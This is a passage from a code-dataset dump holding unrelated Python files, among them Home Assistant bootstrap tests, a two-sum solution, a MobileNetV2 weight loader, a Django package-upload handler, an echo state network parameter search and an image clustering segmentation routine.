len(mock_mount.mock_calls) == 1\n\n with patch('homeassistant.bootstrap.is_virtual_env', return_value=True), \\\n patch('homeassistant.bootstrap.async_enable_logging',\n return_value=mock_coro()), \\\n patch('homeassistant.bootstrap.async_mount_local_lib_path',\n return_value=mock_coro()) as mock_mount, \\\n patch('homeassistant.bootstrap.async_from_config_dict',\n return_value=mock_coro()):\n\n await bootstrap.async_from_config_file('mock-path', hass)\n assert len(mock_mount.mock_calls) == 0\n\n\nasync def test_load_hassio(hass):\n \"\"\"Test that we load Hass.io component.\"\"\"\n with patch.dict(os.environ, {}, clear=True):\n assert bootstrap._get_domains(hass, {}) == set()\n\n with patch.dict(os.environ, {'HASSIO': '1'}):\n assert bootstrap._get_domains(hass, {}) == {'hassio'}\n\n\nasync def test_empty_setup(hass):\n \"\"\"Test an empty set up loads the core.\"\"\"\n await bootstrap._async_set_up_integrations(hass, {})\n for domain in bootstrap.CORE_INTEGRATIONS:\n assert domain in hass.config.components, domain\n\n\nasync def test_core_failure_aborts(hass, caplog):\n \"\"\"Test failing core setup aborts further setup.\"\"\"\n with patch('homeassistant.components.homeassistant.async_setup',\n return_value=mock_coro(False)):\n await bootstrap._async_set_up_integrations(hass, {\n 'group': {}\n })\n\n assert 'core failed to initialize' in caplog.text\n # We aborted early, group not set up\n assert 'group' not in hass.config.components\n\n\nasync def test_setting_up_config(hass, caplog):\n \"\"\"Test we set up domains in config.\"\"\"\n await bootstrap._async_set_up_integrations(hass, {\n 'group hello': {},\n 'homeassistant': {}\n })\n\n assert 'group' in hass.config.components\n\n\nasync def test_setup_after_deps_all_present(hass, caplog):\n \"\"\"Test after_dependencies when all present.\"\"\"\n caplog.set_level(logging.DEBUG)\n order = []\n\n def gen_domain_setup(domain):\n async def async_setup(hass, config):\n order.append(domain)\n return True\n\n return async_setup\n\n mock_integration(hass, MockModule(\n domain='root',\n async_setup=gen_domain_setup('root')\n ))\n mock_integration(hass, MockModule(\n domain='first_dep',\n async_setup=gen_domain_setup('first_dep'),\n partial_manifest={\n 'after_dependencies': ['root']\n }\n ))\n mock_integration(hass, MockModule(\n domain='second_dep',\n async_setup=gen_domain_setup('second_dep'),\n partial_manifest={\n 'after_dependencies': ['first_dep']\n }\n ))\n\n await bootstrap._async_set_up_integrations(hass, {\n 'root': {},\n 'first_dep': {},\n 'second_dep': {},\n })\n\n assert 'root' in hass.config.components\n assert 'first_dep' in hass.config.components\n assert 'second_dep' in hass.config.components\n assert order == ['root', 'first_dep', 'second_dep']\n\n\nasync def test_setup_after_deps_not_trigger_load(hass, caplog):\n \"\"\"Test after_dependencies does not trigger loading it.\"\"\"\n caplog.set_level(logging.DEBUG)\n order = []\n\n def gen_domain_setup(domain):\n async def async_setup(hass, config):\n order.append(domain)\n return True\n\n return async_setup\n\n mock_integration(hass, MockModule(\n domain='root',\n async_setup=gen_domain_setup('root')\n ))\n mock_integration(hass, MockModule(\n domain='first_dep',\n async_setup=gen_domain_setup('first_dep'),\n partial_manifest={\n 'after_dependencies': ['root']\n }\n ))\n mock_integration(hass, MockModule(\n domain='second_dep',\n async_setup=gen_domain_setup('second_dep'),\n partial_manifest={\n 'after_dependencies': ['first_dep']\n }\n ))\n\n await 
bootstrap._async_set_up_integrations(hass, {\n 'root': {},\n 'second_dep': {},\n })\n\n assert 'root' in hass.config.components\n assert 'first_dep' not in hass.config.components\n assert 'second_dep' in hass.config.components\n assert order == ['root', 'second_dep']\n\n\nasync def test_setup_after_deps_not_present(hass, caplog):\n \"\"\"Test after_dependencies when referenced integration doesn't exist.\"\"\"\n caplog.set_level(logging.DEBUG)\n order = []\n\n def gen_domain_setup(domain):\n async def async_setup(hass, config):\n order.append(domain)\n return True\n\n return async_setup\n\n mock_integration(hass, MockModule(\n domain='root',\n async_setup=gen_domain_setup('root')\n ))\n mock_integration(hass, MockModule(\n domain='second_dep',\n async_setup=gen_domain_setup('second_dep'),\n partial_manifest={\n 'after_dependencies': ['first_dep']\n }\n ))\n\n await bootstrap._async_set_up_integrations(hass, {\n 'root': {},\n 'first_dep': {},\n 'second_dep': {},\n })\n\n assert 'root' in hass.config.components\n assert 'first_dep' not in hass.config.components\n assert 'second_dep' in hass.config.components\n assert order == ['root', 'second_dep']\n","sub_path":"tests/test_bootstrap.py","file_name":"test_bootstrap.py","file_ext":"py","file_size_in_byte":7717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"396921089","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Mar 13 22:11:13 2019\r\n\r\n@author: hjiang\r\n\"\"\"\r\n\r\n\"\"\"\r\nGiven an array of integers that is already sorted in ascending order, \r\nfind two numbers such that they add up to a specific target number.\r\n\r\nThe function twoSum should return indices of the two numbers such that they add up to the target, \r\nwhere index1 must be less than index2.\r\n\r\nNote:\r\n\r\nYour returned answers (both index1 and index2) are not zero-based.\r\nYou may assume that each input would have exactly one solution and you may not use the same element twice.\r\nExample:\r\n\r\nInput: numbers = [2,7,11,15], target = 9\r\nOutput: [1,2]\r\nExplanation: The sum of 2 and 7 is 9. 
Therefore index1 = 1, index2 = 2.\r\n只有一个解而且一个数字只能用一次\r\n\"\"\"\r\n\r\n# Time: O(n)\r\n# Space: O(1)\r\n\r\nclass Solution(object):\r\n def twoSum(self, nums, target):\r\n start, end = 0, len(nums) - 1\r\n\r\n while start != end:\r\n sum = nums[start] + nums[end]\r\n if sum > target:\r\n end -= 1\r\n elif sum < target:\r\n start += 1\r\n else:\r\n return [start + 1, end + 1]#这个地方是因为题目中的序号偏了一位","sub_path":"Python3.6/167-Py3-E-Two Sum II - Input array is sorted.py","file_name":"167-Py3-E-Two Sum II - Input array is sorted.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"158200381","text":"import sys\nimport os\nimport re\nfrom requests.utils import urlparse\n\nimport torch\nimport torch.nn as nn\nfrom torch.hub import _download_url_to_file as _download_url_to_file\nfrom MobileNetV2 import MobileNetV2 # https://github.com/tonylins/pytorch-mobilenet-v2\n\nHASH_REGEX = re.compile(r'-([a-f0-9]*)\\.')\nmbnetv2_url = 'https://docs.google.com/uc?id=1jlto6HRVD3ipNkAl1lNhDbkBp7HylaqR&export=download'\nmbnetv2_hash = 'ecbe2b568c8602549fa9e1d5833c63848f490a48d92e5d224d1eb2063e152cf8'\nmbnetv2_fname = 'mobilenet_v2.pth.tar'\n\n\ndef load_url(url, model_dir=None, map_location=None, progress=True, hash_prefix=None, filename=None):\n if model_dir is None:\n torch_home = os.path.expanduser(os.getenv('TORCH_HOME', '~/.torch'))\n model_dir = os.getenv('TORCH_MODEL_ZOO', os.path.join(torch_home, 'models'))\n if not os.path.exists(model_dir):\n os.makedirs(model_dir)\n parts = urlparse(url)\n if filename is None: filename = os.path.basename(parts.path)\n cached_file = os.path.join(model_dir, filename)\n if not os.path.exists(cached_file):\n sys.stderr.write('Downloading: \"{}\" to {}\\n'.format(url, cached_file))\n if hash_prefix is None: hash_prefix = HASH_REGEX.search(filename).group(1)\n _download_url_to_file(url, cached_file, hash_prefix, progress=progress)\n return torch.load(cached_file, map_location=map_location)\n\n\ndef mbnetv2(pretrained=False, **kwargs):\n model = MobileNetV2(width_mult=1, **kwargs)\n if pretrained:\n model.load_state_dict(load_url(mbnetv2_url, hash_prefix=mbnetv2_hash, filename=mbnetv2_fname))\n return model\n\n\ndef _mbnetv2_split(m: nn.Module): return (m[0][0][6], m[0][0][12], m[1])\n","sub_path":"mbnetv2.py","file_name":"mbnetv2.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"296697550","text":"gradeList = list() # [\"midterm\", \"final\", \"homework\"]\nstudentList = list() #[\"Name\",\"Surname\"]\nstudentInfo = {\n \"studentName\": studentList,\n \"studentGrade\" : gradeList\n}\n\naverage = list()\n\nfor i in range(5):\n x = input(\"%d. Öğrencinin ismini giriniz: \" % (i+1))\n y = input(\"%d. Öğrencinin soy ismini giriniz: \" % (i+1))\n\n while True:\n try:\n z = int(input(\"%d. Öğrencinin vize notu giriniz: \" % (i+1)))\n if z <= 0 or 100 <= z:\n print(\"1 ile 100 arasında bir değer girmelisiniz\")\n elif isinstance(z,int):\n break\n except ValueError:\n print(\"1 ile 100 arasında bir int değer girmelisiniz\")\n\n while True:\n try:\n t = int(input(\"%d. Öğrencinin final notu giriniz: \" % (i+1)))\n if t <= 0 or 100 <= t:\n print(\"1 ile 100 arasında bir değer girmelisiniz\")\n elif isinstance(t,int):\n break\n except ValueError:\n print(\"1 ile 100 arasında bir int değer girmelisiniz\")\n\n while True:\n try:\n w = int(input(\"%d. 
Öğrencinin ödev notu giriniz: \" % (i+1)))\n if w <= 0 or 100 <= w:\n print(\"1 ile 100 arasında bir değer girmelisiniz\")\n elif isinstance(w,int):\n break\n except ValueError:\n print(\"1 ile 100 arasında bir int değer girmelisiniz\")\n\n tempStudent=[]\n tempStudentGrade=[]\n\n tempStudent.append(x)\n tempStudent.append(y)\n tempStudentGrade.append(z)\n tempStudentGrade.append(t)\n tempStudentGrade.append(w)\n\n gradeList.append(tempStudentGrade)\n studentList.append(tempStudent)\n average.append(int(sum(studentInfo[\"studentGrade\"][i])/3))\n \nprint(studentInfo)\nprint(\"Tebrikler %s\" % studentList[average.index(max(average))][0])","sub_path":"Homeworks/HW2.py","file_name":"HW2.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"214968423","text":"import hashlib\nimport json\nimport logging\n\nfrom django.conf import settings\nfrom django.http.multipartparser import MultiPartParser\n\nfrom pypi.models import Package\nimport pypi.metadata\n\n\nlog = logging.getLogger(__name__)\n\n\nclass CRLFParts(object):\n \"\"\"A file-like object that wraps a file-like object, turning LF-delimited\n MIME headers into CRLF-delimited ones\n \"\"\"\n def __init__(self, stream, boundary):\n self.boundary = boundary\n self.blocksize = 4096\n assert len(boundary) + 3 < self.blocksize\n\n self._buf = [] # For read()\n self._iter = self._header_transformer(self._line_iter(stream))\n\n def read(self, size=-1):\n \"\"\"Read like a file\"\"\"\n if not self._buf:\n self._buf.append(next(self._iter, b''))\n if len(self._buf[0]) < size or size < 0:\n return self._buf.pop(0)\n block = self._buf.pop(0)\n self._buf.insert(0, block[size:])\n return block[:size]\n\n def _line_iter(self, stream):\n \"\"\"Iterate lines from a stream, or blocks if line length is greater\n than blocksize.\n Not terribly efficient or inefficient...\n \"\"\"\n buf = b''\n while True:\n if len(buf) < self.blocksize:\n buf += stream.read(self.blocksize - len(buf))\n if not buf:\n break\n i = buf.find(b'\\n')\n if i < 0:\n yield buf\n buf = b''\n else:\n yield buf[:i + 1]\n buf = buf[i + 1:]\n\n def _header_transformer(self, lines):\n \"\"\"Transform LF in MIME headers to CRLF\"\"\"\n needle = b'--%s\\n' % self.boundary\n in_header = False\n for line in lines:\n if line == needle:\n in_header = True\n if in_header:\n assert line[-1] == b'\\n'\n line = line[:-1] + b'\\r\\n'\n if line == b'\\r\\n':\n in_header = False\n yield line\n\n\nclass InvalidUpload(Exception):\n pass\n\n\nclass ReplacementDenied(Exception):\n pass\n\n\ndef process(request):\n # Django doesn't like the LF line endings on the MIME headers that\n # distutils will give us.\n boundary = request.META['CONTENT_TYPE'].split('boundary=', 1)[1].encode()\n parser = MultiPartParser(request.META, CRLFParts(request, boundary),\n request.upload_handlers, request.encoding)\n post, files = parser.parse()\n\n # Historically, the protocol field was mis-named, but twine corrected this\n protocol_version = post.get(\n 'protocol_version', post.get('protcol_version', None))\n if protocol_version != '1':\n raise InvalidUpload('Missing/Invalid protocol_version')\n\n if post[':action'] != 'file_upload':\n raise InvalidUpload('The only supported actions are uploads')\n\n if '/' in files['content'].name:\n raise InvalidUpload('Invalid filename')\n\n if post['filetype'] not in getattr(settings, 'PYPI_ALLOWED_UPLOAD_TYPES',\n ('sdist',)):\n raise InvalidUpload('File type disallowed by policy')\n\n 
metadata = parse_metadata(post)\n\n if md5sum(files['content']) != post['md5_digest']:\n raise InvalidUpload(\"MD5 digest doesn't match content\")\n\n name = post['name']\n version = post['version']\n\n package, _ = Package.objects.get_or_create(name=name)\n release, created = package.releases.get_or_create(version=version)\n\n # Update metadata\n release.metadata = json.dumps(metadata)\n release.save()\n\n distribution = release.distributions.filter(filetype=post['filetype'],\n pyversion=post['pyversion'])\n if distribution.exists():\n if not getattr(settings, 'PYPI_ALLOW_REPLACEMENT', True):\n raise ReplacementDenied(\n 'A distribution with the same name and version is already '\n 'present in the repository')\n distribution = distribution[0]\n distribution.delete()\n # The deletion could have garbage collected the Package and Release\n package, _ = Package.objects.get_or_create(name=name)\n release, created = package.releases.get_or_create(version=version)\n\n distribution = release.distributions.create(filetype=post['filetype'],\n pyversion=post['pyversion'],\n md5_digest=post['md5_digest'],\n content=files['content'])\n distribution.save()\n\n\ndef parse_metadata(post_data):\n \"\"\"Parse the uploaded metadata, and return a cleaned up dictionary\"\"\"\n metadata_version = str(post_data['metadata_version'])\n\n try:\n fields = pypi.metadata.metadata_fields(metadata_version)\n except ValueError as e:\n raise InvalidUpload(e)\n\n metadata = {}\n for key in sorted(fields['fields']):\n post_key = key.lower().replace('-', '_')\n if key in fields['required'] and post_key not in post_data:\n raise InvalidUpload('Missing %s, required for Metadata-Version %s'\n % (key, metadata_version))\n\n if post_data.getlist(post_key, []) in ([u'UNKNOWN'], []):\n continue\n\n if key in fields['multivalued']:\n metadata[key] = post_data.getlist(post_key)\n else:\n metadata[key] = post_data.get(post_key)\n\n # Normalise CSV fields to multi-valued\n if key in fields['csv']:\n if key in fields['multivalued']:\n metadata[key] = ','.join(metadata[key])\n metadata[key] = metadata[key].replace(';', ',')\n metadata[key] = [value.strip()\n for value in metadata[key].split(',')\n if value.strip()]\n\n return metadata\n\n\ndef md5sum(file_):\n \"\"\"MD5Sum a UploadedFile\"\"\"\n md5 = hashlib.md5()\n for chunk in file_.chunks():\n md5.update(chunk)\n return md5.hexdigest()\n","sub_path":"yolapi/pypi/upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":6035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"519902564","text":"# coding: utf-8\nimport datetime\n\nfrom market.models import Channel\nfrom utils.future_help import run_on_executor\nfrom micro_service.service import WeixinServer\n\n\ndef get_channel_info(user_instance):\n if user_instance.channel_id and Channel.objects.filter(id=user_instance.channel_id).exists():\n channel_instance = Channel.objects.get(id=user_instance.channel_id)\n channel = {\n 'id': channel_instance.id,\n 'name': channel_instance.name,\n 'create_time': channel_instance.create_time\n }\n else:\n # channel_instance = Channel.objects.filter(userchannel__openid=user_instance.openid).first()\n # if channel_instance:\n # channel = {\n # 'id': channel_instance.id,\n # 'name': channel_instance.name,\n # 'create_time': channel_instance.create_time\n # }\n # else:\n channel = None\n\n return channel\n\n\n@run_on_executor\ndef order_confirmed_template_message(openid, name, confirm_status, remark):\n \"\"\"订单确认模板消息\"\"\"\n 
template_id = 'fOjcVFfvIL2XBGif0uI2-2SVZGMRI7foq3zYCIK4c8U'\n data_template = {\n 'first': '您的订单有新的审核反馈啦',\n 'keyword1': '', # 姓名\n 'keyword2': '', # 日期\n 'keyword3': '', # 审核结果\n 'remark': '' # remark\n }\n data = data_template\n data['keyword1'] = name\n data['keyword2'] = datetime.datetime.now().strftime('%Y-%m-%d: %H:%M:%S')\n data['keyword3'] = confirm_status\n data['remark'] = remark\n url = ''\n WeixinServer.send_template_message(openid, template_id, url, **data)\n return\n\n\n@run_on_executor\ndef create_course_template_message(openid, user_name, sales_man_name, project_name, course_name, course_time, address):\n \"\"\"创建课程通知消息\"\"\"\n templates_id = 'BmuykpTx7GVgJMmc33Wmh54ukw_s_sx3j9H2gum5Mww'\n url = ''\n data_template = {\n 'first': '',\n 'keyword1': '',\n 'keyword2': '',\n 'remark': ''\n }\n data = data_template\n data['first'] = 'Hi【%s】,你的课程顾问【%s】刚刚为你的项目【%s】注册了课程\\n' % (user_name, sales_man_name, project_name)\n data['keyword1'] = course_name\n data['keyword2'] = course_time\n data['remark'] = '上课地点: %s\\n\\n请尽快确认所选课程,若所选课程有误,请立即与您的专属课程顾问联系,更改课程!' % address\n WeixinServer.send_template_message(openid, templates_id, url, **data)\n return","sub_path":"StuSystem/StuSystem/admin/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"178171834","text":"# -*- coding: utf-8 -*-\n#\n# Author: Jörg Schäfer (2010-2016), \n# Frankfurt University of Applied Sciences# FB2, Computer Science and Engineering, Distributed Systems\n# \n# For educational purpose only (not necessarily very pythonic) \n# Requires python 2.7 or higher (3.0 compatible)\n#\n# -----------------------------------------------------------------------------\n# Computes growth related to complexity factors\n# -----------------------------------------------------------------------------\n#\n\nfrom math import *\n\ndef format(str):\n return str.replace(\"e-\", \"\\\\times 10^{-\").replace(\"e+\", \"\\\\times 10^{\").replace(\"'\", \"\")\n \n \ngrowth=((\"n\", lambda x: x),\n (\"n \\\\log n\", lambda x: x*log(x)),\n (\"n^2\", lambda x: x*x),\n (\"2^{\\\\sqrt(n)}\", lambda x: 2**sqrt(x)),\n (\"2^n\", lambda x: 2**x),\n (\"n!\", lambda x: float(factorial(x))))\n\nn = (10, 20, 30, 40, 50)\nmips= 10**9\nprint(\"%autogenerated from growth.py do not edit!\")\nfor row in growth:\n print(\"$f(n)=%s$& $%s}$\\\\cr\" % (row[0], \"}$&$\".join(map(format, [\"%.1e'\" % x for x in [x/mips for x in list(map(row[1], [float(x) for x in n]))]]))))\n","sub_path":"2_Semester/Algorithmen_Datentypen/precompiled/Python-algorithms/growth.py","file_name":"growth.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"15407034","text":"import numpy as np\nimport matplotlib.pyplot as plt\n#from pyESN import ESN\nimport ESN\nimport ESN2\n# import ESNold as ESN\n# import reservoir as ESN\nfrom sklearn.model_selection import GridSearchCV\n\ndef set_seed(seed=None):\n \"\"\"Making the seed (for random values) variable if None\"\"\"\n\n # Set the seed\n if seed is None:\n import time\n seed = int((time.time()*10**6) % 4294967295)\n try:\n np.random.seed(seed)\n except Exception as e:\n print( \"!!! WARNING !!!: Seed was not set correctly.\")\n print( \"!!! Seed that we tried to use: \"+str(seed))\n print( \"!!! 
Error message: \"+str(e))\n seed = None\n print( \"Seed used for random values:\", seed)\n return seed\n\n## Set a particular seed for the random generator (for example seed = 42), or use a \"random\" one (seed = None)\n# NB: reservoir performances should be averaged accross at least 30 random instances (with the same set of parameters)\nseed = 42 #None #42\n\nset_seed(seed) #random.seed(seed)\n\n## load the data and select which parts are used for 'warming', 'training' and 'testing' the reservoir\n# 30 seems to be enough for initLen with leak_rate=0.3 and reservoir size (resSize) = 300\ninitLen = 1000 # number of time steps during which internal activations are washed-out during training\n# we consider trainLen including the warming-up period (i.e. internal activations that are washed-out when training)\ntrainLen = initLen + 3000 # number of time steps during which we train the network\ntestLen = 4000 # number of time steps during which we test/run the network\nminmse=100\ndata = np.loadtxt('2.txt')\nprint( \"data dimensions\", data.shape)\n\n\n\n# generate the ESN reservoir\n# inSize = outSize = 1 #input/output dimension\n# resSize = 300 #reservoir size (for prediction)\n# resSize = 1000 #reservoir size (for generation)\n# spectral_radius = 1.25\n# input_scaling = 1.\ndef getpap(list1):\n list2=[]\n a=list1[0]\n while a<=list1[1]:\n list2.append(a)\n a=a+list1[2]\n return list2\nn_reservoir_op =getpap([100,500,100])\nleak_rate_op=getpap([0.1,0.5,0.1])\nproba_non_zero_connec_W_op=getpap([0.1,0.5,0.1])\nregularization_coef_op=[1e-4,1e-5,1e-6,1e-7,1e-8]\nn_inputs =25\ninput_bias = True # add a constant input to 1\nn_outputs = 25\n#n_reservoir =300 # number of recurrent units300\n#leak_rate = 0.3 # leaking rate (=1/time_constant_of_neurons)\nspectral_radius = 1.25 # Scaling of recurrent matrix\ninput_scaling = 1. # Scaling of input matrix\n#proba_non_zero_connec_W = 0.2 # Sparsity of recurrent matrix: Perceptage of non-zero connections in W matrix\nproba_non_zero_connec_Win = 1. # Sparsity of input matrix\nproba_non_zero_connec_Wfb = 1. 
# Sparsity of feedback matrix\n#regularization_coef = 1e-5 #None # regularization coefficient, if None, pseudo-inverse is use instead of ridge regression\n# out_func_activation = lambda x: x\n\n\n\nfor i in range(len(n_reservoir_op)):\n for j in range(len(leak_rate_op)):\n for t in range(len(proba_non_zero_connec_W_op)):\n for r in range(len(regularization_coef_op)):\n n_reservoir=n_reservoir_op[i]\n leak_rate=leak_rate_op[j]\n proba_non_zero_connec_W=proba_non_zero_connec_W_op[t]\n regularization_coef=regularization_coef_op[r]\n N = n_reservoir # 100\n dim_inp = n_inputs # 26\n ## Generating random weight matrices with toolbox methods\n # import mat_gen\n # W = mat_gen.generate_internal_weights(N=self.N, spectral_radius=self.sr, proba=self.w_proba,\n # # seed=seed, verbose=verbose)\n # Wstd=self.Wstd, seed=current_seed, verbose=verbose)\n # Win = mat_gen.generate_input_weights(nbr_neuron=self.N, dim_input=self.stim_sent_train[0].shape[1], #TODO stim_sent_train[0].shape\n # input_scaling=self.iss, proba=self.w_in_proba, input_bias=self.input_bias, seed=current_seed, verbose=verbose)\n # Wfb = mat_gen.generate_input_weights(nbr_neuron=self.N, dim_input=self.dim_output, #TODO stim_sent_train[0].shape\n # input_scaling=self.fbscale, proba=self.fbproba, input_bias=None, seed=current_seed, verbose=verbose)\n\n ### Generating random weight matrices with custom method\n line = np.arange(0, trainLen + testLen, 1)\n W = np.random.rand(N, N) - 0.5\n if input_bias:\n Win = np.random.rand(N, dim_inp + 1) - 0.5\n else:\n Win = np.random.rand(N, dim_inp) - 0.5\n Wfb = np.random.rand(N, n_outputs) - 0.5\n\n # # Mantas way\n # Win = (np.random.rand(N,1+dim_inp)-0.5) * input_scaling\n # W = np.random.rand(N,N)-0.5\n\n ## delete the fraction of connections given the sparsity (i.e. 
proba of non-zero connections):\n mask = np.random.rand(N, N) # create a mask Uniform[0;1]\n W[mask > proba_non_zero_connec_W] = 0 # set to zero some connections given by the mask\n mask = np.random.rand(N, Win.shape[1])\n Win[mask > proba_non_zero_connec_Win] = 0\n # mask = np.random.rand(N,Wfb.shape[1])\n # Wfb[mask > proba_non_zero_connec_Wfb] = 0\n\n ## SCALING of matrices\n # scaling of input matrix\n Win = Win * input_scaling\n # scaling of recurrent matrix\n # compute the spectral radius of these weights:\n print('Computing spectral radius...')\n original_spectral_radius = np.max(np.abs(np.linalg.eigvals(W)))\n # TODO: check if this operation is quicker: max(abs(linalg.eig(W)[0])) #from scipy import linalg\n print(\"default spectral radius before scaling:\", original_spectral_radius)\n # rescale them to reach the requested spectral radius:\n W = W * (spectral_radius / original_spectral_radius)\n print(\"spectral radius after scaling\", np.max(np.abs(np.linalg.eigvals(W))))\n\n reservoir = ESN.ESN(lr=leak_rate, W=W, Win=Win, input_bias=input_bias, ridge=regularization_coef,\n Wfb=None, fbfunc=None)\n\n \"\"\"mean=np.mean(data,0)\n var=np.var(data,0)\n print(mean)\n print(var)\n for i in range(len(mean)):\n data[:,i]=data[:,i]-mean[i]\n data[:,i]=data[:,i]/var[i]\n print(data)\"\"\"\n\n train_in = data[0:trainLen, :]\n train_out = data[1:trainLen + 1, :]\n test_in = data[trainLen:trainLen + testLen, :]\n test_out = data[trainLen + 1:trainLen + testLen + 1, :]\n print(train_in.shape)\n\n # train_in, train_out = np.vstack([data[0:trainLen],data[0:trainLen]]), np.vstack([data[0+1:trainLen+1], data[0+1:trainLen+1]])\n # test_in, test_out = np.vstack([data[trainLen:trainLen+testLen],data[trainLen:trainLen+testLen]]) , np.vstack([data[trainLen+1:trainLen+testLen+1],data[trainLen+1:trainLen+testLen+1]])\n\n # train_in, train_out = np.atleast_2d(data[0:trainLen]), np.atleast_2d(data[0+1:trainLen+1])\n # test_in, test_out = np.atleast_2d(data[trainLen:trainLen+testLen]), np.atleast_2d(data[trainLen+1:trainLen+testLen+1])\n\n # rearange inputs in correct dimensions\n # train_in, train_out = train_in.T, train_out.T\n # test_in, test_out = test_in.T, test_out.T\n\n # Dimensions of input/output train/test data\n print(\"train_in, train_out dimensions\", train_in.shape, train_out.shape)\n print(\"test_in, test_out dimensions\", test_in.shape, test_out.shape)\n\n internal_trained = reservoir.train(inputs=[train_in, ], teachers=[train_out, ],\n wash_nr_time_step=initLen, verbose=False)\n # print(internal_trained)\n output_pred, internal_pred = reservoir.run(inputs=[test_in, ], reset_state=False)\n\n errorLen = len(test_out[:]) # testLen #2000\n\n\n mse = np.mean((test_out[:] - output_pred[0]) ** 2)\n if mse type : binop , leaf : + , children = [node a, node b] (Here, if a is number, node a is 5) form. If string, 6))\n\t\t\t2) if s do e1 else e2 => type : ifelse , leaf : if , children = [node s, node e1, node e2]\n\t\t\t3) a = 2 => type : assign , leaf : = , children = [node a, node 2]\n\t\t\t4) print(e) => type : function , leaf : print , children = node e\n\t\t\t5) 1 => type : number , leaf : number , children = node 1\n\t\t\t6) a => type : name , leaf : name , children = node a\n\t\t\t\n\t\t\t* Note that leaf should be string and children can be list or string according to whether it is the last tree or not. 
You should make\n\t\t\ttake care of children is list or not to make \"do\" method.\n\t\t'''\n\t\t\n\t\tself.type = type\n\t\t\n\t\t# make children list or object\n\t\tif children:\n\t\t\tself.children = children\n\t\telse:\n\t\t\tself.children = 0.0\n\t\t\t\n\t\tself.leaf = leaf\n\t\n\t# This method is called when we type just object on console. For test\n\tdef __str__(self):\n\t\treturn str([self.leaf, self.children])\n\t\t\n\t# To test the node tree. If you want to see node tree structure, make showNodeTree True\n\tdef traverse(self):\n\t\tchildTree = []\n\t\tif isinstance(self.children, types.ListType):\n\t\t\tfor child in self.children:\n\t\t\t\tif child.__doc__ == \"Simple Node\":\n\t\t\t\t\tchildTree.append(child.traverse())\n\t\t\t\telse:\n\t\t\t\t\tchildTree.append(child)\n\t\telse:\n\t\t\tif self.children.__doc__ == \"Simple Node\":\n\t\t\t\tchildTree = self.children.traverse()\n\t\t\telse:\n\t\t\t\tchildTree = self.children\n\t\treturn [self.leaf, childTree]\n\n#-----------------------------------------------------------------------------#","sub_path":"SWIM-Executables/Unix/pyinstaller-2.0/swim3/AST.py","file_name":"AST.py","file_ext":"py","file_size_in_byte":3857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"623360728","text":"#scratch.py\nfrom bashplotlib.scatterplot import plot_scatter\n\nx_coords = [-10,20,30]\ny_coords = [-10,20,30]\nwidth = 10\nchar = 'x'\ncolor = 'default'\ntitle = 'My Test Graph'\n\nplot_scatter(\n None,\n x_coords,\n y_coords,\n width,\n char,\n color,\n title)","sub_path":"scratch.py","file_name":"scratch.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"564951051","text":"#\nfrom PIL import Image\nimport cv2\nimport numpy as np\nimport sklearn\nfrom sklearn import mixture\nfrom sklearn.cluster import KMeans\n\ndef segmentByClustering (rgbImage, colorSpace, clusteringMethod, numberOfClusters ):\n \n import numpy as np\n #determine if xy is required\n space=colorSpace.split(\"+\")\n leng=len(space)\n w ,h = rgbImage.shape[:2]\n\t#generate XY matrix\n if leng == 2:\n import numpy as np\n x=range(w)\n xmat= np.repeat(x,h)\n xmat=xmat.reshape(w,h)\n xmat=np.uint8(xmat)\n y=range(h)\n ymat= np.repeat(y,w)\n ymat=ymat.reshape(w,h)\n ymat=np.uint8(ymat)\n colorSpace=space[0]\n\t#change image to the specified color space\n def RGB(rgbImage):\n newImage = rgbImage\n return newImage\n def HSV (rgbImage):\n import cv2\n newImage = cv2.cvtColor(rgbImage, cv2.COLOR_BGR2HSV)\n return newImage\n def LAB (rgbImage):\n import skimage\n newImage = cv2.cvtColor(rgbImage, cv2.COLOR_BGR2LAB)\n return newImage\n\t#Switch for color space\n S_color = {\n \"rgb\" : RGB,\n \"lab\" : LAB,\n\t\t\"hsv\" : HSV\n\t}\n func = S_color.get(colorSpace)\n \n newImage=func(rgbImage)\n \n\t#aply XY matrix if needed\n if leng == 2:\n \n temp=np.ndarray(shape=(w,h,5))\n temp[:,:,0]=newImage[:,:,0]\n temp[:,:,1]=newImage[:,:,1]\n temp[:,:,2]=newImage[:,:,2]\n temp[:,:,3]=xmat\n temp[:,:,4]=ymat\n newImage=temp\n \n indx= 0\n size=newImage.shape\n \n if leng ==2: \n \n repMat=np.zeros((size[0]*size[1],5))\n else:\n repMat=np.zeros((size[0]*size[1],3))\n \n for i in range(size[0]):\n for j in range(size[1]):\n \n\n if leng ==2:\n \n i1= (newImage[i,j,3]/(255-0))\n j1= (newImage[i,j,4]/(255-0))\n repMat[indx]= [newImage[i,j,0],newImage[i,j,1],newImage[i,j,2], i1,j1]\n indx=indx+1\n \n else:\n \n repMat[indx]= 
